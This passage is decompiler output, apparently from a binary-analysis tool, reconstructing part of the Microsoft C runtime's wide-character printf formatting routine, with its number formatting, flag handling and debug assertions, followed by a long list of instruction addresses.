    														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    															__eflags =  *(__ebp - 0x10) & 0x00000020;
    															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																__eflags =  *(__ebp - 0x10) & 0x00000040;
    																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																	__ecx = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	__edx = 0;
    																	__eflags = 0;
    																	 *(__ebp - 0x4a0) = __eax;
    																	 *(__ebp - 0x49c) = 0;
    																} else {
    																	__eax = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	asm("cdq");
    																	 *(__ebp - 0x4a0) = __eax;
    																	 *(__ebp - 0x49c) = __edx;
    																}
    															} else {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																__eflags =  *(__ebp - 0x10) & 0x00000040;
    																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																	__ecx = __ebp + 0x14;
    																	E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																	asm("cdq");
    																	 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    																	 *(__ebp - 0x49c) = __edx;
    																} else {
    																	__eax = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	__ax = __eax;
    																	asm("cdq");
    																	 *(__ebp - 0x4a0) = __eax;
    																	 *(__ebp - 0x49c) = __edx;
    																}
    															}
    														} else {
    															__eax = __ebp + 0x14;
    															 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    															 *(__ebp - 0x49c) = __edx;
    														}
    													} else {
    														__ecx = __ebp + 0x14;
    														 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    														 *(__ebp - 0x49c) = __edx;
    													}
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    													__eflags =  *(__ebp - 0x10) & 0x00000040;
    													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    														L167:
    														__ecx =  *(__ebp - 0x4a0);
    														 *(__ebp - 0x4a8) =  *(__ebp - 0x4a0);
    														__edx =  *(__ebp - 0x49c);
    														 *(__ebp - 0x4a4) =  *(__ebp - 0x49c);
    														goto L168;
    													} else {
    														L163:
    														__eflags =  *(__ebp - 0x49c);
    														if(__eflags > 0) {
    															goto L167;
    														}
    														L164:
    														if(__eflags < 0) {
    															L166:
    															 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
    															__edx =  *(__ebp - 0x49c);
    															asm("adc edx, 0x0");
    															__edx =  ~( *(__ebp - 0x49c));
    															 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
    															 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    															L168:
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    															__eflags =  *(__ebp - 0x10) & 0x00008000;
    															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																__eflags =  *(__ebp - 0x10) & 0x00001000;
    																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																	__edx =  *(__ebp - 0x4a8);
    																	__eax =  *(__ebp - 0x4a4);
    																	__eax =  *(__ebp - 0x4a4) & 0x00000000;
    																	__eflags = __eax;
    																	 *(__ebp - 0x4a4) = __eax;
    																}
    															}
    															__eflags =  *(__ebp - 0x30);
    															if( *(__ebp - 0x30) >= 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    																__eflags =  *(__ebp - 0x30) - 0x200;
    																if( *(__ebp - 0x30) > 0x200) {
    																	 *(__ebp - 0x30) = 0x200;
    																}
    															} else {
    																 *(__ebp - 0x30) = 1;
    															}
    															 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    															__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    															if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
    																 *(__ebp - 0x1c) = 0;
    															}
    															__eax = __ebp - 0x249;
    															 *(__ebp - 4) = __ebp - 0x249;
    															while(1) {
    																L178:
    																__ecx =  *(__ebp - 0x30);
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) > 0) {
    																	goto L180;
    																}
    																L179:
    																 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    																__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    																if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
    																	goto L183;
    																}
    																L180:
    																__eax =  *(__ebp - 8);
    																asm("cdq");
    																__ecx =  *(__ebp - 0x4a4);
    																__edx =  *(__ebp - 0x4a8);
    																__eax = E00B855B0( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8),  *(__ebp - 0x4a8));
    																 *(__ebp - 0x494) = __eax;
    																__eax =  *(__ebp - 8);
    																asm("cdq");
    																__eax =  *(__ebp - 0x4a4);
    																__ecx =  *(__ebp - 0x4a8);
    																 *(__ebp - 0x4a8) = E00B85630( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8), __edx);
    																 *(__ebp - 0x4a4) = __edx;
    																__eflags =  *(__ebp - 0x494) - 0x39;
    																if( *(__ebp - 0x494) > 0x39) {
    																	__edx =  *(__ebp - 0x494);
    																	__edx =  *(__ebp - 0x494) +  *(__ebp - 0x460);
    																	__eflags = __edx;
    																	 *(__ebp - 0x494) = __edx;
    																}
    																__eax =  *(__ebp - 4);
    																 *( *(__ebp - 4)) =  *(__ebp - 0x494);
    																 *(__ebp - 4) =  *(__ebp - 4) - 1;
    																 *(__ebp - 4) =  *(__ebp - 4) - 1;
    																L178:
    																__ecx =  *(__ebp - 0x30);
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) > 0) {
    																	goto L180;
    																}
    																goto L179;
    															}
    														}
    														L165:
    														__eflags =  *(__ebp - 0x4a0);
    														if( *(__ebp - 0x4a0) >= 0) {
    															goto L167;
    														}
    														goto L166;
    													}
    												case 0xe:
    													while(1) {
    														L187:
    														if( *(_t600 - 0x28) != 0) {
    															goto L212;
    														}
    														goto L188;
    													}
    											}
    										case 8:
    											L24:
    											__ecx =  *(__ebp - 0x10);
    											__ecx =  *(__ebp - 0x10) | 0x00000002;
    											 *(__ebp - 0x10) = __ecx;
    											goto L27;
    										case 9:
    											L25:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    											goto L27;
    										case 0xa:
    											L23:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    											goto L27;
    										case 0xb:
    											L22:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    											goto L27;
    										case 0xc:
    											L26:
    											__eax =  *(__ebp - 0x10);
    											__eax =  *(__ebp - 0x10) | 0x00000008;
    											__eflags = __eax;
    											 *(__ebp - 0x10) = __eax;
    											goto L27;
    										case 0xd:
    											L27:
    											goto L214;
    									}
    								} else {
    									_t574 = 0;
    									if(0 == 0) {
    										 *(_t600 - 0x4dc) = 0;
    									} else {
    										 *(_t600 - 0x4dc) = 1;
    									}
    									 *(_t600 - 0x46c) =  *(_t600 - 0x4dc);
    									if( *(_t600 - 0x46c) == 0) {
    										_push( &M00B77C38);
    										_push(0);
    										_push(0x460);
    										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    										_push(2);
    										_t501 = L00B7D760();
    										_t603 = _t603 + 0x14;
    										if(_t501 == 1) {
    											asm("int3");
    										}
    									}
    									L14:
    									if( *(_t600 - 0x46c) != 0) {
    										goto L16;
    									} else {
    										 *((intOrPtr*)(L00B80C60(_t546))) = 0x16;
    										E00B809F0(_t534, _t546, _t598, _t599,  &M00B77C38, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    										 *(_t600 - 0x4c8) = 0xffffffff;
    										E00B7C650(_t600 - 0x40);
    										_t486 =  *(_t600 - 0x4c8);
    										goto L225;
    									}
    								}
    							}
    							L215:
    							if( *(_t600 - 0x45c) == 0) {
    								L218:
    								 *(_t600 - 0x4f8) = 1;
    								L219:
    								_t574 =  *(_t600 - 0x4f8);
    								 *(_t600 - 0x4bc) =  *(_t600 - 0x4f8);
    								if( *(_t600 - 0x4bc) == 0) {
    									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    									_push(0);
    									_push(0x8f5);
    									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    									_push(2);
    									_t491 = L00B7D760();
    									_t603 = _t603 + 0x14;
    									if(_t491 == 1) {
    										asm("int3");
    									}
    								}
    								if( *(_t600 - 0x4bc) != 0) {
    									 *(_t600 - 0x4d4) =  *(_t600 - 0x44c);
    									E00B7C650(_t600 - 0x40);
    									_t486 =  *(_t600 - 0x4d4);
    								} else {
    									 *((intOrPtr*)(L00B80C60(_t538))) = 0x16;
    									E00B809F0(_t534, _t538, _t598, _t599, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    									 *(_t600 - 0x4d0) = 0xffffffff;
    									E00B7C650(_t600 - 0x40);
    									_t486 =  *(_t600 - 0x4d0);
    								}
    								goto L225;
    							}
    							L216:
    							if( *(_t600 - 0x45c) == 7) {
    								goto L218;
    							}
    							L217:
    							 *(_t600 - 0x4f8) = 0;
    							goto L219;
    						}
    					} else {
    						L113:
    						 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    						__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    						 *(__ebp - 0x4cc) = 0xffffffff;
    						__ecx = __ebp - 0x40;
    						__eax = E00B7C650(__ecx);
    						__eax =  *(__ebp - 0x4cc);
    						L225:
    						return E00B805D0(_t486, _t534,  *(_t600 - 0x48) ^ _t600, _t574, _t598, _t599);
    					}
    					L115:
    					if(( *(_t600 - 0x10) & 0x00000020) == 0) {
    						 *( *(_t600 - 0x484)) =  *(_t600 - 0x44c);
    					} else {
    						 *( *(_t600 - 0x484)) =  *(_t600 - 0x44c);
    					}
    					 *(_t600 - 0x28) = 1;
    					goto L187;
    				}
    			}

















    0x00b967ba
    0x00b967ba
    0x00b967ba
    0x00b967be
    0x00b967c3
    0x00b967c6
    0x00b967d3
    0x00000000
    0x00000000
    0x00b967d9
    0x00b967d9
    0x00b967db
    0x00b967e9
    0x00b967dd
    0x00b967dd
    0x00b967dd
    0x00b967f3
    0x00b967f9
    0x00b96806
    0x00b96808
    0x00b9680d
    0x00b9680f
    0x00b96814
    0x00b96819
    0x00b9681b
    0x00b96820
    0x00b96826
    0x00b96828
    0x00b96828
    0x00b96826
    0x00b96830
    0x00b96878
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00b96d7a
    0x00b96d80
    0x00b96d8a
    0x00b96da4
    0x00b96dbe
    0x00b96dc5
    0x00b96dc9
    0x00b96dc9
    0x00b96da6
    0x00b96dab
    0x00b96daf
    0x00b96daf
    0x00b96d8c
    0x00b96d91
    0x00b96d95
    0x00b96d95
    0x00b96d8a
    0x00b96dd9
    0x00b96de5
    0x00b96dfb
    0x00b96e00
    0x00b96e00
    0x00b96e16
    0x00b96e1b
    0x00b96e24
    0x00b96e2c
    0x00b96e42
    0x00b96e47
    0x00b96e47
    0x00b96e2c
    0x00b96e4e
    0x00b96f08
    0x00b96f1b
    0x00b96f20
    0x00000000
    0x00b96e54
    0x00b96e54
    0x00b96e58
    0x00000000
    0x00000000
    0x00b96e5e
    0x00b96e61
    0x00b96e6a
    0x00b96e70
    0x00b96e70
    0x00b96e7f
    0x00b96e87
    0x00000000
    0x00000000
    0x00b96e89
    0x00b96e8c
    0x00b96eb1
    0x00b96eb6
    0x00b96eb9
    0x00b96ec6
    0x00b96ed4
    0x00b96ee7
    0x00b96eec
    0x00b96efb
    0x00000000
    0x00b96efb
    0x00b96ec8
    0x00b96ec8
    0x00000000
    0x00b96ec8
    0x00b96f06
    0x00b96f23
    0x00b96f2a
    0x00b96f32
    0x00b96f48
    0x00b96f4d
    0x00b96f4d
    0x00b96f32
    0x00b96f2a
    0x00b96f50
    0x00b96f54
    0x00b96f5c
    0x00b96f61
    0x00b96f64
    0x00b96f64
    0x00b96f6b
    0x00b96f6b
    0x00b960eb
    0x00b960f2
    0x00b960ff
    0x00b96104
    0x00000000
    0x00b96117
    0x00b96121
    0x00b96148
    0x00b9612f
    0x00b96140
    0x00b96140
    0x00b96121
    0x00b96152
    0x00b96158
    0x00b96164
    0x00b96167
    0x00b96175
    0x00b96178
    0x00b96185
    0x00b9622a
    0x00b96230
    0x00b9623d
    0x00000000
    0x00000000
    0x00b96243
    0x00b96249
    0x00000000
    0x00b96250
    0x00b96250
    0x00b9626a
    0x00b9626f
    0x00000000
    0x00000000
    0x00b96277
    0x00b96277
    0x00b9627e
    0x00b96281
    0x00b96284
    0x00b96287
    0x00b9628a
    0x00b9628d
    0x00b96290
    0x00b96297
    0x00b9629e
    0x00000000
    0x00000000
    0x00b962aa
    0x00b962aa
    0x00b962b1
    0x00b962bd
    0x00b962c0
    0x00b962c6
    0x00b962cd
    0x00000000
    0x00000000
    0x00b962cf
    0x00b962d5
    0x00b962d5
    0x00b962dc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b96320
    0x00b96320
    0x00b96327
    0x00b9632a
    0x00b96354
    0x00b96357
    0x00b96357
    0x00b96361
    0x00b96361
    0x00b96365
    0x00b9632c
    0x00b9632c
    0x00b96338
    0x00b9633b
    0x00b9633f
    0x00b96341
    0x00b96344
    0x00b96344
    0x00b96347
    0x00b9634a
    0x00b9634d
    0x00b9634f
    0x00b9634f
    0x00b96352
    0x00b96368
    0x00000000
    0x00000000
    0x00b9636d
    0x00b9636d
    0x00000000
    0x00000000
    0x00b96379
    0x00b96379
    0x00b96380
    0x00b96383
    0x00b963a3
    0x00b963a6
    0x00b963a6
    0x00b963b0
    0x00b963b0
    0x00b963b4
    0x00b96385
    0x00b96385
    0x00b96391
    0x00b96394
    0x00b96398
    0x00b9639a
    0x00b9639a
    0x00b963a1
    0x00000000
    0x00000000
    0x00b963bc
    0x00b963bc
    0x00b963c3
    0x00b963cf
    0x00b963d2
    0x00b963d8
    0x00b963df
    0x00b964f2
    0x00000000
    0x00b964f2
    0x00b963e5
    0x00b963eb
    0x00b963eb
    0x00b963f2
    0x00000000
    0x00b96429
    0x00b96429
    0x00b9642c
    0x00b9642f
    0x00b96432
    0x00b96459
    0x00b96459
    0x00b9645c
    0x00b9645f
    0x00b96462
    0x00b96486
    0x00b96486
    0x00b96489
    0x00b9648c
    0x00b9648f
    0x00b964c8
    0x00b964d9
    0x00000000
    0x00b964d9
    0x00b96491
    0x00b96491
    0x00b96494
    0x00b96497
    0x00b9649a
    0x00000000
    0x00000000
    0x00b9649c
    0x00b9649c
    0x00b9649f
    0x00b964a2
    0x00b964a5
    0x00000000
    0x00000000
    0x00b964a7
    0x00b964a7
    0x00b964aa
    0x00b964ad
    0x00b964b0
    0x00000000
    0x00000000
    0x00b964b2
    0x00b964b2
    0x00b964b5
    0x00b964b8
    0x00b964bb
    0x00000000
    0x00000000
    0x00b964bd
    0x00b964bd
    0x00b964c0
    0x00b964c3
    0x00b964c6
    0x00b964ca
    0x00000000
    0x00b964ca
    0x00000000
    0x00b964c6
    0x00b96464
    0x00b96464
    0x00b96467
    0x00b9646b
    0x00b9646e
    0x00000000
    0x00b96470
    0x00b96473
    0x00b96476
    0x00b9647c
    0x00b96481
    0x00000000
    0x00b96481
    0x00b9646e
    0x00b96434
    0x00b96434
    0x00b96437
    0x00b9643b
    0x00b9643e
    0x00000000
    0x00b96440
    0x00b96443
    0x00b96446
    0x00b9644c
    0x00b96451
    0x00000000
    0x00b96451
    0x00000000
    0x00b964db
    0x00b964db
    0x00b964de
    0x00b964e1
    0x00000000
    0x00000000
    0x00b963f9
    0x00b963f9
    0x00b963fc
    0x00b963ff
    0x00b96402
    0x00b9641b
    0x00b9641e
    0x00b9641e
    0x00b96421
    0x00b96404
    0x00b96404
    0x00b96407
    0x00b9640a
    0x00b96410
    0x00b96416
    0x00b96416
    0x00000000
    0x00000000
    0x00b964e6
    0x00b964e6
    0x00b964e9
    0x00b964e9
    0x00b964ef
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b964f7
    0x00b964f7
    0x00b964fe
    0x00b96504
    0x00b9650a
    0x00b9650d
    0x00b96513
    0x00b9651a
    0x00000000
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d27
    0x00b96d2d
    0x00b96d30
    0x00b96d33
    0x00b96d36
    0x00b96d39
    0x00b96d3f
    0x00b96d3f
    0x00b96d3f
    0x00b96d47
    0x00b96d4b
    0x00000000
    0x00000000
    0x00b96d4d
    0x00b96d4d
    0x00b96d50
    0x00b96d53
    0x00b96d53
    0x00b96d58
    0x00b96d5b
    0x00b96d5e
    0x00b96d61
    0x00b96d64
    0x00b96d67
    0x00b96d6a
    0x00b96d6a
    0x00b96d6d
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00b96520
    0x00b96526
    0x00b96526
    0x00b9652d
    0x00000000
    0x00b968b1
    0x00b968b1
    0x00b968bf
    0x00b968bf
    0x00b968c2
    0x00000000
    0x00000000
    0x00b96534
    0x00b96537
    0x00b96537
    0x00b9653d
    0x00b9653f
    0x00b96542
    0x00b96542
    0x00b96545
    0x00b96545
    0x00000000
    0x00000000
    0x00b9667a
    0x00b9667d
    0x00b9667d
    0x00b96682
    0x00b96684
    0x00b96687
    0x00b96687
    0x00b9668a
    0x00b9668a
    0x00000000
    0x00000000
    0x00b96a7d
    0x00b96a7d
    0x00000000
    0x00000000
    0x00b965e4
    0x00b965e4
    0x00b965f0
    0x00b965f6
    0x00b965fd
    0x00b9660b
    0x00b9660b
    0x00b96611
    0x00b96614
    0x00b96620
    0x00b96675
    0x00000000
    0x00b96675
    0x00b965ff
    0x00b965ff
    0x00b96605
    0x00b96609
    0x00b96628
    0x00b96628
    0x00b9662e
    0x00b96656
    0x00b9665d
    0x00b96663
    0x00b96666
    0x00b96669
    0x00b9666f
    0x00b96672
    0x00b96630
    0x00b96630
    0x00b96636
    0x00b96639
    0x00b9663c
    0x00b96642
    0x00b96645
    0x00b96648
    0x00b9664a
    0x00b9664d
    0x00b9664d
    0x00000000
    0x00b9662e
    0x00000000
    0x00000000
    0x00b968c9
    0x00b968cc
    0x00b968cf
    0x00b968d2
    0x00b968d8
    0x00b968db
    0x00b968e2
    0x00b968e6
    0x00b968f1
    0x00b968f1
    0x00b968f5
    0x00b9690c
    0x00b9690c
    0x00b96913
    0x00b96915
    0x00b96915
    0x00b9691c
    0x00b9691c
    0x00b96923
    0x00b96931
    0x00b96934
    0x00b96943
    0x00b96946
    0x00b9694a
    0x00b9695f
    0x00b9694c
    0x00b9694c
    0x00b9694f
    0x00b96955
    0x00b9695a
    0x00b9695a
    0x00b9694a
    0x00b96969
    0x00b9696c
    0x00b9696f
    0x00b96972
    0x00b96975
    0x00b96978
    0x00b9697e
    0x00b96984
    0x00b9698c
    0x00b9698d
    0x00b96990
    0x00b96991
    0x00b96994
    0x00b96995
    0x00b9699c
    0x00b9699d
    0x00b969a0
    0x00b969a1
    0x00b969a4
    0x00b969a5
    0x00b969ab
    0x00b969ac
    0x00b969bb
    0x00b969bd
    0x00b969c3
    0x00b969c3
    0x00b969c8
    0x00b969ca
    0x00b969ce
    0x00b969d0
    0x00b969d8
    0x00b969d9
    0x00b969dc
    0x00b969dd
    0x00b969ec
    0x00b969ee
    0x00b969ee
    0x00b969ce
    0x00b969f1
    0x00b969f8
    0x00b969fb
    0x00b96a00
    0x00b96a00
    0x00b96a06
    0x00b96a08
    0x00b96a10
    0x00b96a11
    0x00b96a14
    0x00b96a15
    0x00b96a23
    0x00b96a25
    0x00b96a25
    0x00b96a06
    0x00b96a28
    0x00b96a2b
    0x00b96a2e
    0x00b96a31
    0x00b96a36
    0x00b96a3b
    0x00b96a3e
    0x00b96a41
    0x00b96a41
    0x00b96a44
    0x00b96a44
    0x00b96a47
    0x00b96a53
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00b96d70
    0x00b968f7
    0x00b968f7
    0x00b968fe
    0x00b96901
    0x00000000
    0x00000000
    0x00b96903
    0x00b96903
    0x00000000
    0x00b96903
    0x00b968e8
    0x00b968e8
    0x00000000
    0x00000000
    0x00b96548
    0x00b96548
    0x00b96553
    0x00b9655b
    0x00b96562
    0x00b96565
    0x00b96565
    0x00b96568
    0x00b965c8
    0x00b9656a
    0x00b96571
    0x00b96577
    0x00b9657d
    0x00b96584
    0x00b96587
    0x00b9658d
    0x00b96595
    0x00b96597
    0x00b9659e
    0x00b965a5
    0x00b965ac
    0x00b965b4
    0x00b965b6
    0x00b965b8
    0x00b965b8
    0x00b965bf
    0x00b965cf
    0x00b965d5
    0x00b965d8
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00b96a5b
    0x00b96a5e
    0x00b96a61
    0x00b96a64
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b96ac4
    0x00b96ac4
    0x00b96ace
    0x00b96ace
    0x00b96ad4
    0x00b96ad6
    0x00b96ad9
    0x00b96ad9
    0x00b96adf
    0x00b96adf
    0x00000000
    0x00000000
    0x00b96a76
    0x00b96a76
    0x00000000
    0x00000000
    0x00b9668d
    0x00b9668d
    0x00b96691
    0x00b9669f
    0x00b966a2
    0x00b96693
    0x00b96693
    0x00b96693
    0x00b966a8
    0x00b966ae
    0x00b966b4
    0x00b966c0
    0x00b966c6
    0x00b966c6
    0x00b966c9
    0x00b96751
    0x00b96751
    0x00b96755
    0x00b96757
    0x00b9675d
    0x00b9675d
    0x00b96760
    0x00b96767
    0x00b9676a
    0x00b96770
    0x00b96770
    0x00b96770
    0x00b96776
    0x00b9677c
    0x00b9677f
    0x00b96785
    0x00b96787
    0x00000000
    0x00000000
    0x00b96789
    0x00b96789
    0x00b9678f
    0x00b96792
    0x00b96794
    0x00000000
    0x00000000
    0x00b96796
    0x00b9679c
    0x00b9679f
    0x00b9679f
    0x00b967a7
    0x00b967a7
    0x00b967ad
    0x00b967ad
    0x00b967b2
    0x00000000
    0x00b966cf
    0x00b966cf
    0x00b966cf
    0x00b966d3
    0x00b966d5
    0x00b966da
    0x00b966da
    0x00b966dd
    0x00b966e0
    0x00b966e6
    0x00b966f8
    0x00b966f8
    0x00b966f8
    0x00b966fb
    0x00b96701
    0x00000000
    0x00000000
    0x00b96703
    0x00b96703
    0x00b96709
    0x00b9670c
    0x00b9670e
    0x00000000
    0x00000000
    0x00b96710
    0x00b96710
    0x00b96719
    0x00b9671f
    0x00b96723
    0x00b9672b
    0x00b9672d
    0x00b9672f
    0x00b96735
    0x00b96735
    0x00b96738
    0x00b96738
    0x00b96744
    0x00b96747
    0x00b966ef
    0x00b966f2
    0x00b966f2
    0x00b966f5
    0x00b966f5
    0x00b9674f
    0x00b967b5
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00000000
    0x00b96a6d
    0x00b96a6d
    0x00000000
    0x00000000
    0x00b96a89
    0x00b96a89
    0x00b96a93
    0x00b96a93
    0x00b96a9d
    0x00b96a9d
    0x00b96aa3
    0x00b96aa5
    0x00b96aaa
    0x00b96ab4
    0x00b96ab4
    0x00b96ab7
    0x00b96abb
    0x00b96abb
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
    0x00b96bbe
    0x00b96c00
    0x00b96c00
    0x00b96c06
    0x00b96c0c
    0x00b96c12
    0x00000000
    0x00b96bc0
    0x00b96bc0
    0x00b96bc0
    0x00b96bc7
    0x00000000
    0x00000000
    0x00b96bc9
    0x00b96bc9
    0x00b96bd4
    0x00b96bda
    0x00b96bdc
    0x00b96be2
    0x00b96be5
    0x00b96be7
    0x00b96bed
    0x00b96bf6
    0x00b96bfb
    0x00b96c18
    0x00b96c1b
    0x00b96c1b
    0x00b96c20
    0x00b96c25
    0x00b96c25
    0x00b96c2b
    0x00b96c2d
    0x00b96c33
    0x00b96c39
    0x00b96c39
    0x00b96c42
    0x00b96c42
    0x00b96c2b
    0x00b96c48
    0x00b96c4c
    0x00b96c5a
    0x00b96c5d
    0x00b96c60
    0x00b96c67
    0x00b96c69
    0x00b96c69
    0x00b96c4e
    0x00b96c4e
    0x00b96c4e
    0x00b96c76
    0x00b96c76
    0x00b96c7c
    0x00b96c7e
    0x00b96c7e
    0x00b96c85
    0x00b96c8b
    0x00b96c8e
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9a
    0x00b96c9c
    0x00000000
    0x00000000
    0x00b96c9e
    0x00b96ca4
    0x00b96ca4
    0x00b96caa
    0x00000000
    0x00000000
    0x00b96cac
    0x00b96cac
    0x00b96caf
    0x00b96cb2
    0x00b96cb9
    0x00b96cc0
    0x00b96cc8
    0x00b96cce
    0x00b96cd1
    0x00b96cd4
    0x00b96cdb
    0x00b96ce7
    0x00b96ced
    0x00b96cf3
    0x00b96cfa
    0x00b96cfc
    0x00b96d02
    0x00b96d02
    0x00b96d08
    0x00b96d08
    0x00b96d0e
    0x00b96d17
    0x00b96d1c
    0x00b96d1f
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9a
    0x00b96c9c
    0x00000000
    0x00000000
    0x00000000
    0x00b96c9c
    0x00b96c8e
    0x00b96bcb
    0x00b96bcb
    0x00b96bd2
    0x00000000
    0x00000000
    0x00000000
    0x00b96bd2
    0x00000000
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00000000
    0x00b962f9
    0x00b962f9
    0x00b962fc
    0x00b962ff
    0x00000000
    0x00000000
    0x00b96304
    0x00b96307
    0x00b9630d
    0x00000000
    0x00000000
    0x00b962ee
    0x00b962f1
    0x00b962f4
    0x00000000
    0x00000000
    0x00b962e3
    0x00b962e6
    0x00b962e9
    0x00000000
    0x00000000
    0x00b96312
    0x00b96312
    0x00b96315
    0x00b96315
    0x00b96318
    0x00000000
    0x00000000
    0x00b9631b
    0x00000000
    0x00000000
    0x00b9618b
    0x00b9618b
    0x00b9618d
    0x00b9619b
    0x00b9618f
    0x00b9618f
    0x00b9618f
    0x00b961ab
    0x00b961b8
    0x00b961ba
    0x00b961bf
    0x00b961c1
    0x00b961c6
    0x00b961cb
    0x00b961cd
    0x00b961d2
    0x00b961d8
    0x00b961da
    0x00b961da
    0x00b961d8
    0x00b961db
    0x00b961e2
    0x00000000
    0x00b961e4
    0x00b961e9
    0x00b96205
    0x00b9620d
    0x00b9621a
    0x00b9621f
    0x00000000
    0x00b9621f
    0x00b961e2
    0x00b96185
    0x00b96f70
    0x00b96f77
    0x00b96f8e
    0x00b96f8e
    0x00b96f98
    0x00b96f98
    0x00b96f9e
    0x00b96fab
    0x00b96fad
    0x00b96fb2
    0x00b96fb4
    0x00b96fb9
